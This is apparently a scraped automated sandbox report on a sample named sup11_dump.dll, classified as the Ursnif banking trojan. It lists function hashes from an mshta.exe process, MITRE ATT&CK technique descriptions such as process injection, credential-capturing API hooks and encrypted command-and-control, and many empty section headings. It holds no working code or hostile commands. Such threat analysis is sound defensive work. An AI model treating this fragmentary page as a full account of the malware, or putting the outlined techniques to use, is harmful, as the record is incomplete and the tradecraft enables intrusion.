API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 090c235475177a4a6105c763e5b8fff29123855bcdf62853d6c9b69e7ee58342
Instruction ID: 692eabdf5051d07464a09100f2c95e7b0a5de9b4ae79a43e6df5bb126aa07d09
Opcode Fuzzy Hash: 090c235475177a4a6105c763e5b8fff29123855bcdf62853d6c9b69e7ee58342
Instruction Fuzzy Hash: 1CE01233C05621ABCB126BA4AC08C8FBBA9EF893607054E16F55493114C731C925DBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 4220 Parent PID: 3292 mshta.exeCOMMON

Executed Functions

Function 0000022FB9FF0FB2, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000003.397041622.0000022FB9FF0000.00000010.00000001.sdmp, Offset: 0000022FB9FF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
Instruction ID: b0dfc5b1aa92c1227d878a25d447a74efef032bef03bc8a37262990d8cc25f85
Opcode Fuzzy Hash: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
Instruction Fuzzy Hash: D5B0920446BA825ED61212B20C692592A60AA4B128FC919D68455C5092E00805895262

Uniqueness

Uniqueness Score: -1.00%

Function 0000022FB9FF0FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000003.397041622.0000022FB9FF0000.00000010.00000001.sdmp, Offset: 0000022FB9FF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 45f61e5d83e8ab2625bc8c4a4503b63e115ab7340ddf818e409ea9bf92930d6f
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: E59002044A740665D46411D14D4D35C5050A38D164FD844E0882690184E44D02961592

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report sup11_dump.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre